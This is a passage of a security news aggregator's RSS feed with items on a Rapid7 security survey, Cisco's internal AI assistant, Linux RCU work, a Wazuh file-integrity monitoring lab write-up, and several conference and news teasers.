MDR model. That reflects a reality many teams know well: internal expertise remains essential, but external support can help extend coverage, add specialist knowledge, and support faster response when internal resources are stretched.</span></p><p><span>This hybrid model also speaks to the complexity security teams are managing. Modern environments span cloud, identity, endpoints, applications, third parties, and expanding attack surfaces. Keeping watch across all of it requires more than tooling alone. It requires the right mix of people, process, visibility, and support.</span></p><p><span>At the same time, many organizations are still working to connect the dots across their security ecosystem. Two-thirds of respondents said their security capabilities are only partially integrated. For analysts, partial integration often means more manual work: switching between tools, stitching together context, and making decisions with an incomplete picture. When teams are jumping between systems, manually stitching together context, or working from incomplete data, it becomes harder to act at the speed modern threats demand.</span></p><p><span>The survey also showed that only 10% of respondents describe their organization as “highly proactive” in predicting and preventing threats, which points to the reality of where many teams are today. The ambition is there, but becoming truly preemptive takes time, integration, and operational maturity. Most organizations are still balancing the day-to-day demands of reactive response with the longer-term work of building a more proactive security model.</span></p><p><span>Confidence levels tell a similar story. 59% of respondents said they are only somewhat confident in their organization’s ability to prevent attacks before impact. Security teams understand what is at stake, but many still lack full confidence that they can consistently stop threats before they affect the business.</span></p><h2>AI is a priority, but trust matters</h2><p><span>AI was, of course, another major theme in the survey. Interest is high, especially when it comes to improving efficiency, accelerating triage, and helping teams manage growing volumes of data and alerts, but adoption is still developing. 52% of respondents said AI is in early-stage exploration within their security operations.</span></p><p><span>AI has clear potential in the SOC and across security operations, from summarizing investigations to enriching alerts, supporting prioritization, and helping analysts move faster. But security teams have to be deliberate about how they apply it. In high-pressure environments where accuracy, context, and accountability matter, AI needs to earn trust.</span></p><p><span>The survey results show that trust is still a key consideration. 57% of respondents cited securing AI usage as a top AI and security concern, while 44% cited lack of transparency or trust. These responses reflect a practical mindset. Security leaders are thinking about both sides of AI: how it can help defenders move faster, and how to manage the new risks it introduces. Internally, for AI to become operationally valuable, it has to fit into existing workflows, provide explainable outputs, and support human expertise.</span></p><h2>What security teams want next</h2><p><span>When respondents were asked what is preventing them from becoming more proactive, the top challenges were practical and familiar. 54% cited limited staff or expertise, making capacity one of the biggest barriers to progress. Teams may have the ambition to become more preemptive, but many are already balancing daily alert queues, incident response, vulnerability backlogs, compliance pressure, and business-as-usual security demands.</span></p><p><span>Visibility is another major factor. 31% of respondents cited lack of visibility across the environment as a barrier to becoming more proactive. Without a clear view of assets, identities, exposures, and attacker activity, teams struggle to prioritize what matters most. This is especially important as organizations look to move from broad detection toward more risk-aware, preemptive action.</span></p><p><span>The priorities respondents selected show where they want to go next. 41% selected preemptive security as a top security leadership priority, while improving resilience, strengthening incident response, reducing complexity, and improving risk visibility also appeared as recurring themes.</span></p><p><span>The findings from our Global Security Summit make one thing clear: security teams are ready to move toward more proactive, integrated, and AI-enabled operations, but they need the right visibility, expertise, and confidence to do it well.</span></p><p><span>To hear more from the experts and practitioners who joined us at the summit, catch up on the </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>on-demand sessions</span></a><span>. And to learn how Rapid7 is helping organizations move toward preemptive security, explore </span><a href="https://www.rapid7.com/campaign/managed-detection-and-response/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Rapid7 Managed Detection and Response</span></a><span>, built to disrupt attackers earlier with broad ecosystem coverage, risk visibility, expert guidance, and an AI-powered SOC.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber-Resilienz aufbauen: Diese menschliche Fähigkeit schützt besser als jede Software]]></title>
<description><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3653579/it-nachrichten/cyber-resilienz-aufbauen-diese-menschliche-faehigkeit-schuetzt-besser-als-jede-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653579/it-nachrichten/cyber-resilienz-aufbauen-diese-menschliche-faehigkeit-schuetzt-besser-als-jede-software/</guid>
<pubDate>Wed, 08 Jul 2026 09:48:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-gestützte Angriffe überwinden selbst beste Firewalls. Was wirklich schützt: gut vorbereitete Menschen. Wie du Cyber-Resilienz zur Teamkompetenz machst, zeigt der Signal Security Summit am 18. November in Köln.
<a href="https://t3n.de/news/cyber-resilienz-aufbauen-menschliche-faehigkeit-1745335/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The State of Warfighting Acquisition]]></title>
<description><![CDATA[Author: mitrecorp (The MITRE Corporation) - Bewertung: 0x - Views:3 Our Beyond Barriers: Acquisition on a War Footing Summit brought together industry experts and senior government leaders to accelerate the Department of War Acquisition Transformation Strategy at speed and scale with smart risk-t...]]></description>
<link>https://tsecurity.de/de/3652425/it-security-video/the-state-of-warfighting-acquisition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652425/it-security-video/the-state-of-warfighting-acquisition/</guid>
<pubDate>Tue, 07 Jul 2026 20:03:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: mitrecorp (The MITRE Corporation) - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/4Nd-A6NRmZ4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Our Beyond Barriers: Acquisition on a War Footing Summit brought together industry experts and senior government leaders to accelerate the Department of War Acquisition Transformation Strategy at speed and scale with smart risk-taking.<br />
 <br />
The transformation underway expands the industrial base, strengthens resilience, aligns incentives, and enables a culture of empowerment and accountability within the warfighting acquisition workforce. <br />
 <br />
Thank you to our speakers and panelists for sharing their insights, and to all who were able to join us for this important event.<br />
<br />
Session recordings are available here: https://youtube.com/playlist?list=PLLGRmm150VfDOSecOnVqm-rmE75RuVJBC&si=abxZ0vtzQUL5IVsq<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Faster RCUs and lockless memory allocation]]></title>
<description><![CDATA[Puranjay Mohan shared some of the

work he's been doing recently on improving the
performance of read-copy-update (RCU) at the 2026

Linux
Storage, Filesystem, Memory-Management, and BPF Summit; his talk would have
been nice context to have earlier in the day when Harry Yoo and Alexei
Starovoitov...]]></description>
<link>https://tsecurity.de/de/3651740/linux-tipps/faster-rcus-and-lockless-memory-allocation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651740/linux-tipps/faster-rcus-and-lockless-memory-allocation/</guid>
<pubDate>Tue, 07 Jul 2026 15:53:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Puranjay Mohan shared some of the
<a href="https://lwn.net/ml/all/20260417231203.785172-1-puranjay@kernel.org/">
work</a> he's been doing recently on improving the
performance of read-copy-update (RCU) at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux
Storage, Filesystem, Memory-Management, and BPF Summit</a>; his talk would have
been nice context to have earlier in the day when Harry Yoo and Alexei
Starovoitov led a session about the
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=af92793e52c3">
new <tt>kmalloc_nolock()</tt> function</a> that
allows for lockless allocation from any kernel context, and which interacts with
the RCU subsystem to allow that. This article therefore covers the two sessions
together and in the reverse order, to provide that missing context.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Edition: July 7, 2026]]></title>
<description><![CDATA[Signup to receive the Early Edition in your inbox here. A curated weekday guide to major news and developments over the last 24 hours. Here’s today’s news: NATO SUMMIT  “We will announce tens of billions in new contracts that will provide the crucial kit we need to deter and defend,” NATO Secreta...]]></description>
<link>https://tsecurity.de/de/3651434/it-security-nachrichten/early-edition-july-7-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651434/it-security-nachrichten/early-edition-july-7-2026/</guid>
<pubDate>Tue, 07 Jul 2026 14:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Signup to receive the Early Edition in your inbox here. A curated weekday guide to major news and developments over the last 24 hours. Here’s today’s news: NATO SUMMIT  “We will announce tens of billions in new contracts that will provide the crucial kit we need to deter and defend,” NATO Secretary-General Mark Rutte told reporters […]</p>
<p>The post <a href="https://www.justsecurity.org/145903/early-edition-july-7-2026/">Early Edition: July 7, 2026</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Identitäten als Grundlage der IT-Sicherheit: Beiträge für neue Konferenz gesucht - Heise]]></title>
<description><![CDATA[Identitätsmanagement wird immer mehr zum zentralen Hebel für die IT-Sicherheit in Unternehmen. Der ICC Summit bietet Antworten, wie identity-first ...]]></description>
<link>https://tsecurity.de/de/3648993/it-security-nachrichten/identitaeten-als-grundlage-der-it-sicherheit-beitraege-fuer-neue-konferenz-gesucht-heise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648993/it-security-nachrichten/identitaeten-als-grundlage-der-it-sicherheit-beitraege-fuer-neue-konferenz-gesucht-heise/</guid>
<pubDate>Mon, 06 Jul 2026 16:09:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Identitätsmanagement wird immer mehr zum zentralen Hebel für die <b>IT</b>-<b>Sicherheit</b> in Unternehmen. Der ICC Summit bietet Antworten, wie identity-first ...]]></content:encoded>
</item>
<item>
<title><![CDATA[SUSE AI Factory with NVIDIA is now generally available]]></title>
<description><![CDATA[Turning AI potential into operational resilience Key takeaways Operational shift: The AI hype cycle is officially moving into true enterprise industrialization and mission-critical deployment. Turnkey platform: SUSE AI Factory with NVIDIA delivers a secure framework to easily launch scalable work...]]></description>
<link>https://tsecurity.de/de/3648667/unix-server/suse-ai-factory-with-nvidia-is-now-generally-available/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648667/unix-server/suse-ai-factory-with-nvidia-is-now-generally-available/</guid>
<pubDate>Mon, 06 Jul 2026 14:01:26 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Turning AI potential into operational resilience Key takeaways Operational shift: The AI hype cycle is officially moving into true enterprise industrialization and mission-critical deployment. Turnkey platform: SUSE AI Factory with NVIDIA delivers a secure framework to easily launch scalable workflows. Economic stability: Organizations benefit from predictable CapEx models and unified, end-to-end infrastructure support. The era […]</p>
<p>The post <a href="https://www.suse.com/c/suse-ai-factory-with-nvidia-is-now-generally-available/">SUSE AI Factory with NVIDIA is now generally available</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ciscos KI-Assistent: Ein Alleskönner für den Arbeitsalltag]]></title>
<description><![CDATA[Um die Produktivität zu steigern und Shadow AI zu verhindern, stattete Cisco seine 90.000 Mitarbeiter mit einem KI-Assistenten aus Sundry Photography – shutterstock.com



Seit dem Aufkommen von ChatGPT versuchen Unternehmen, das Potenzial generativer KI als digitalen Assistenten in konkrete Prod...]]></description>
<link>https://tsecurity.de/de/3648398/it-security-nachrichten/ciscos-ki-assistent-ein-alleskoenner-fuer-den-arbeitsalltag/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648398/it-security-nachrichten/ciscos-ki-assistent-ein-alleskoenner-fuer-den-arbeitsalltag/</guid>
<pubDate>Mon, 06 Jul 2026 12:08:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/09/cisco_san_jose.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Cisco Hauptquartier in San Jose" class="wp-image-3534040" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Um die Produktivität zu steigern und Shadow AI zu verhindern, stattete Cisco seine 90.000 Mitarbeiter mit einem KI-Assistenten aus </figcaption></figure><p class="imageCredit">Sundry Photography – shutterstock.com</p></div>



<p>Seit dem Aufkommen von ChatGPT versuchen Unternehmen, das Potenzial generativer KI als digitalen Assistenten in konkrete Produktivitätsgewinne für möglichst viele Beschäftigte zu übersetzen. Der Netzwerkausrüster Cisco zählt dabei zu den Vorreitern.</p>



<p>„Die ursprüngliche Idee für einen internen Assistenten entstand bei Cisco, als ChatGPT und andere KI-Tools für Endverbraucher Ende 2022 und Anfang 2023 auf den Markt kamen. Damals diskutierte das Cisco-Management, ob die Nutzung solcher Dienste durch Mitarbeiter erlaubt werden sollte“, erklärt <a href="https://www.linkedin.com/in/srini/">Srini Namineni</a>, Chief Automation Officer bei Cisco.</p>



<p>„Die große Frage lautete: Sollten wir den Zugriff tatsächlich sperren?“, erinnert er sich. „Die Risiken lagen auf der Hand, denn Mitarbeiter könnten Unternehmensdaten eingeben, die dann für andere sichtbar werden. Wir haben uns bewusst dagegen entschieden und gesagt: Statt die Nutzung zu verbieten, stellen wir eine sichere Alternative bereit.“</p>



<h2 class="wp-block-heading">Ein KI-Assistent für 90.000 Mitarbeiter</h2>



<p>Der Ende 2023 eingeführte interne KI-Assistent sollte zugleich verhindern, dass sich im Unternehmen eine Vielzahl unterschiedlicher KI-Lösungen etabliert. Stattdessen setzte Cisco auf eine zentrale Plattform, die den Beschäftigten dennoch die Flexibilität bietet, verschiedene KI-Modelle zu nutzen.</p>



<p>Anfangs unterstützte der KI-Assistent Azure OpenAI und Google Gemini. Heute lassen sich laut Namineni neue Modelle innerhalb weniger Wochen integrieren, sobald Mitarbeiter entsprechende Anforderungen äußern. Aus dem ursprünglichen Chatbot sei inzwischen eine vielseitige Plattform geworden, die Funktionen eines Copiloten, Programmierassistenten und HR-Helfers vereine und Mitarbeiter bei einer Vielzahl von Aufgaben unterstütze.</p>



<p>Der KI-Assistent, der Cisco den <a href="https://www.cio.com/article/220017/us-cio-100-winners-celebrating-it-innovation-and-leadership.html">2026 CIO 100 Award</a> für IT-Innovation und Führungsstärke einbrachte, spart den Ingenieuren nach Angaben des Unternehmens durchschnittlich sechs Stunden pro Woche; Mitarbeitern in anderen Bereichen rund fünf Stunden.</p>



<p>Während die Hauptziele des Projekts Sicherheit und Flexibilität waren, hat Cisco einen dritten Vorteil entdeckt: Mit monatlichen Kosten von etwa zehn Dollar pro Nutzer liegt der interne KI-Assistent laut Namineni unter den Abopreisen mehrerer handelsüblicher KI-Assistenten.</p>



<h2 class="wp-block-heading">KI-Risiken reduzieren</h2>



<p>Der Assistent steht den Beschäftigten seit 2024 zur Verfügung. Im ersten Quartal 2026 nutzten ihn bereits mehr als 96.000 Mitarbeiter – das entspricht einer Nutzungsquote von 90 Prozent. Auch die Resonanz fällt laut einer unternehmensinternen Befragung positiv aus:</p>



<ul class="wp-block-list">
<li>79 Prozent der Beschäftigten sind der Meinung, dass ihnen der Assistent Zeit spart,</li>



<li>72 Prozent sehen eine höhere Produktivität und</li>



<li>71 Prozent bescheinigen ihm eine Verbesserung der Qualität ihrer Arbeit.</li>
</ul>



<p>Ein konkretes Beispiel ist die Softwareentwicklung: Dort unterstützt der Assistent Entwickler dabei, selbst kleinste Programmierfehler aufzuspüren und automatisiert Unit-Tests zu erstellen. Dadurch habe sich der Entwicklungsprozess deutlich beschleunigt, so Cisco.</p>



<p>Namineni und sein Team sorgen kontinuierlich dafür, dass der Assistent neue Funktionen erhält. Dadurch bietet er inzwischen mehr Möglichkeiten als mancheam Markt erhältliche Standardlösung. So können Mitarbeiter über den Assistenten KI-Prompts untereinander austauschen und Personalaufgaben wie das Beantragen von Urlaub erledigen, ohne sich bei einem anderen Dienst anmelden zu müssen.</p>



<p>Darüber hinaus lassen sich unternehmenseigene Datensätze in geschützte OneDrive-Ordner hochladen, um maßgeschneiderte KI-Projekte umzusetzen. Außerdem stellt Cisco Retrieval-Augmented Generation (RAG) als Dienst bereit, sodass Beschäftigte interne Dokumente und Metadaten sicher per KI durchsuchen und abfragen können.</p>



<p>Laut Cisco basiert das Projekt auf einer Microservices-Architektur, die eine schnelle Einbindung neuer KI-Anwendungen ermöglicht. Das Unternehmen versteht den Assistenten als KI-Teamkollegen und verfolgt langfristig die Vision, jedem Beschäftigten ein virtuelles Team aus KI-Agenten zur Seite zu stellen.</p>



<h2 class="wp-block-heading">Der nächste Entwicklungsschritt</h2>



<p>Namineni plant bereits weitere Funktionen. Künftig sollen personalisierte KI-Agenten jeden Mitarbeiter dauerhaft unterstützen. Mit entsprechender Berechtigung könnten diese Agenten auf E-Mails und Webex-Konten zugreifen und eigenständig Aufgaben übernehmen. So könnte ein persönlicher Agent beispielsweise E-Mails nach Priorität sortieren.</p>



<p>Auch im Personal- und Finanzwesen sieht der Automatisierungsspezialist weiteres Automatisierungspotenzial. Ziel sei es, Mitarbeitern von Routinetätigkeiten zu entlasten, damit sie sich auf anspruchsvollere Aufgaben konzentrieren können.</p>



<p>Die Kontrolle soll jedoch weiterhin beim Menschen bleiben. „Ich bin nicht bereit, die Kontrolle zu 100 Prozent abzugeben – außer bei Aufgaben mit geringem Wert, bei denen ein Fehler akzeptabel wäre. Denn die KI macht Fehler“, so Namineni. „Unsere Herausforderung besteht darin, diese Leistungsfähigkeit gezielt auf Anwendungsfälle zu beschränken, in denen sie möglichst viel Arbeit übernehmen kann, während der Mensch weiterhin in den Prozess eingebunden bleibt.“</p>



<p>Neben dem „CIO 100 Award“ hat das Cisco-Projekt auch weitere Auszeichnungen erhalten. Der KI-Assistent könne als Vorbild für andere Großunternehmen dienen, die ihre Mitarbeiter dazu ermutigen möchten, KI sicher zu nutzen, erklärt <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005268">Amy Loomis</a>, Group Vice President für Workplace Solutions bei IDC.</p>



<h2 class="wp-block-heading">Der Logik folgen</h2>



<p>Andere Unternehmen könnten die Logik dieses Ansatzes übernehmen, auch wenn sie möglicherweise nicht den spezifischen technischen Stack von Cisco kopieren wollten, so die Analystin. Die Architektur, einschließlich der Integration dualer Modelle, der hybriden Multicloud-Orchestrierung, RAG-as-a-Service und Microservices, spiegele die Größe und die technischen Kapazitäten von Cisco wider, merkt Loomis an.</p>



<p>Entscheidend sei vielmehr die zugrundeliegende Strategie: Unternehmen sollten ihren Beschäftigten frühzeitig eine zentral gesteuerte interne KI-Umgebung bereitstellen, bevor sich unkontrollierte Shadow AI etabliert. Zudem gelte es, die Vielzahl einzelner KI-Werkzeuge über eine einheitliche, intelligente Oberfläche zusammenzuführen, klare Zugriffs- und Verantwortungsregeln zu schaffen und KI als Instrument zu positionieren, das die Qualität und Reichweite der menschlichen Arbeit verbessert.</p>



<p>Die eigentliche Innovation sieht Loomis nicht in einzelnen Technologien, sondern in deren Zusammenspiel. Komponenten wie RAG-Pipelines, der Zugriff auf GPT-4o, die OneDrive-Integration oder eine Microservices-Architektur seien zwar auch anderswo verfügbar. Cisco habe sie jedoch zu einer integrierten Unternehmensplattform zusammengeführt.</p>



<p>„Weniger verbreitet ist es, all diese Komponenten in einer zentral verwalteten, unternehmenseigenen Umgebung mit klar definierten Datenkontrollen zu kombinieren, anstatt Mitarbeiteranfragen an externe KI-Dienste weiterzuleiten, bei denen sensible Informationen in öffentliche Trainingsdatensätze gelangen könnten“, erklärt die Gartner-Analystin.</p>



<p>Als Beispiel nennt Loomis die Funktion „My Projects“, über die Mitarbeiter firmeneigene Datensätze in gesicherten OneDrive-Ordnern speichern und anschließend mithilfe der KI gezielt auswerten oder befragen können. Dadurch erhielten sie die benötigten Funktionen, ohne auf nicht autorisierte externe KI-Dienste ausweichen zu müssen.</p>



<p>Lob findet sie außerdem für Ciscos grundsätzliche Positionierung von KI. Das Unternehmen verstehe künstliche Intelligenz nicht als Ersatz für Beschäftigte, sondern als Verstärker ihrer Fähigkeiten.</p>



<p>„Jedem Mitarbeiter einen Satz von KI-Werkzeugen bereitzustellen, der auf die jeweilige Rolle und den Arbeitskontext abgestimmt ist, ist ebenso eine Frage des Change Management wie der Technologie“, erklärt sie. „Unternehmen, die KI als Werkzeug zur Erweiterung menschlicher Fähigkeiten und nicht als Ersatz für menschliche Arbeit präsentieren, erzielen in der Regel eine höhere Akzeptanz, weil sie Widerstände gegen die Einführung neuer Technologien abbauen.“ (mb)</p>



<p><strong>Dieser Artikel basiert auf einem <a href="https://www.cio.com/article/4189683/ciscos-in-house-ai-assistant-is-a-jack-of-all-trades.html" data-type="link" data-id="https://www.cio.com/article/4189683/ciscos-in-house-ai-assistant-is-a-jack-of-all-trades.html">Beitrag </a>der Schwesterpublikation CIO.com. </strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Identitäten als Grundlage der IT-Sicherheit: Beiträge für neue Konferenz gesucht]]></title>
<description><![CDATA[Identitätsmanagement wird immer mehr zum zentralen Hebel für die IT-Sicherheit in Unternehmen. Der ICC Summit bietet Antworten, wie identity-first funktioniert.]]></description>
<link>https://tsecurity.de/de/3648172/it-nachrichten/heise-angebot-identitaeten-als-grundlage-der-it-sicherheit-beitraege-fuer-neue-konferenz-gesucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648172/it-nachrichten/heise-angebot-identitaeten-als-grundlage-der-it-sicherheit-beitraege-fuer-neue-konferenz-gesucht/</guid>
<pubDate>Mon, 06 Jul 2026 10:18:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Identitätsmanagement wird immer mehr zum zentralen Hebel für die IT-Sicherheit in Unternehmen. Der ICC Summit bietet Antworten, wie identity-first funktioniert.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time]]></title>
<description><![CDATA[OverviewIn this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, ...]]></description>
<link>https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</guid>
<pubDate>Mon, 06 Jul 2026 08:52:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Overview</h3><p>In this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, and deleting files and folders, and by running a benign malware simulation that triggered Windows processes leading to registry updates. This demonstrated how FIM detects not only direct malicious modifications but also related system-level activity that occurs during suspicious endpoint behavior, supporting incident investigation and root-cause analysis.</p><p>File Integrity Monitoring (FIM) is a security control used to track changes made to files and system configurations. It helps detect when files are created, modified, or deleted, and when critical system areas like the Windows Registry are altered. Since many attacks rely on changing files or registry keys to maintain persistence or evade detection, FIM provides an important layer of visibility into what’s happening on an endpoint. For this project, i used Windows endpoint.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>You can read more about File Integrity Monitoring in official Wazuh Documentation <a href="https://documentation.wazuh.com/current/user-manual/capabilities/file-integrity/how-to-configure-fim.html">here</a></p><h3>Configuration &amp; Detection</h3><ol><li><strong>Edit the agent’s ossec.conf file</strong></li></ol><ul><li>On the Windows endpoint, the Wazuh agent configuration file is located at</li></ul><pre>C:\Program Files (x86)\ossec-agent\ossec.conf</pre><p>and edit the ossec.conf file using notepad (open as an administrator).</p><ul><li>Add the directories you want to monitor within the &lt;syscheck&gt; block</li></ul><pre>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public\Downloads&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Lily\Desktop&lt;/directories&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FvCOZ9zsrpNFIJueyym_mg.jpeg"><figcaption>ossec.conf</figcaption></figure><ul><li>Restart the Wazuh agent to apply changes</li></ul><pre>Restart-Service wazuh-agent</pre><p><strong>2. Test the Configuration</strong></p><ul><li><strong>Create files</strong></li></ul><p>I created a file on Desktop named “Malware Docs”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/309/1*t2EqYJ5s-CzT5CPjy3XF7Q.jpeg"></figure><p><strong>Alert Visualization</strong></p><p>Navigate to Endpoint security &gt; File Integrity Monitoring &gt; Events on the Wazuh dashboard to view the alert generated when the FIM module detects changes in the monitored file. The created file was logged as ‘file added’</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GovN3S1Zqm5TfSX4swCExw.jpeg"><figcaption>files created</figcaption></figure><ul><li><strong>Modify Files</strong></li></ul><p>To demonstrate file modification detection, I edited the contents of a file in the Downloads folder named “Malicious.txt”</p><p><strong>Alert Visualization</strong></p><p>This action was detected by Wazuh File Integrity Monitoring and logged as a “file modification” event in the dashboard.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U69WhITQ5XSQt_M2gCvdEw.jpeg"><figcaption>file modified</figcaption></figure><ul><li><strong>Delete Files</strong></li></ul><p>Several files were deleted, and this activity was detected by Wazuh File Integrity Monitoring and logged as “File deleted” events.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d5uYJbK7Lj43OfFAV4yLBQ.jpeg"><figcaption>files deleted</figcaption></figure><ul><li><strong>Registry Modification</strong></li></ul><p>To demonstrate registry monitoring, I ran a benign malware simulation that attempted to establish persistence. This action triggered legitimate Windows system processes, which in turn updated related registry keys in the background. Wazuh detected these changes and logged them as registry modification events, demonstrating how File Integrity Monitoring can capture both direct malware activity and the secondary system behaviors it provokes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WjRpltYtUzY_kx0L1hWpkg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAQRxfW3ATRLAkQTG0PXFA.jpeg"></figure><h3>Dashboard Insights &amp; Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BqYTVh5qn5LCmGvzoPlpMA.jpeg"><figcaption>FIM Dashboard</figcaption></figure><p>This project demonstrated the practical value of File Integrity Monitoring through hands-on configuration, testing, and analysis using Wazuh. I successfully monitored file systems and Windows Registry keys, validated detection with manual changes and a malware simulation, and used the Wazuh dashboard to turn raw alerts into actionable insights.</p><p>FIM proved to be a critical visibility tool not just for compliance, but for real-time detection, rapid investigation, and understanding attack behaviors through change analysis. By capturing both legitimate and malicious modifications, it serves as a foundational layer in a proactive security posture.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> for inspiring me to take on this project.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=269e384f3fa7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time-269e384f3fa7">Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Betrug nimmt zu: Mehr als jeder zweite Nutzer weltweit betroffen - Retail-News.de]]></title>
<description><![CDATA[Hacker und Programmiercode als Symbol fuer Cyber Crime Foto: depositphotos.com. Key takeaways. ➟ Online-Betrug nimmt weltweit deutlich zu und ...]]></description>
<link>https://tsecurity.de/de/3647686/hacking/online-betrug-nimmt-zu-mehr-als-jeder-zweite-nutzer-weltweit-betroffen-retail-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647686/hacking/online-betrug-nimmt-zu-mehr-als-jeder-zweite-nutzer-weltweit-betroffen-retail-newsde/</guid>
<pubDate>Mon, 06 Jul 2026 05:23:45 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Hacker</b> und Programmiercode als Symbol fuer Cyber Crime Foto: depositphotos.com. Key takeaways. ➟ Online-Betrug nimmt weltweit deutlich zu und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
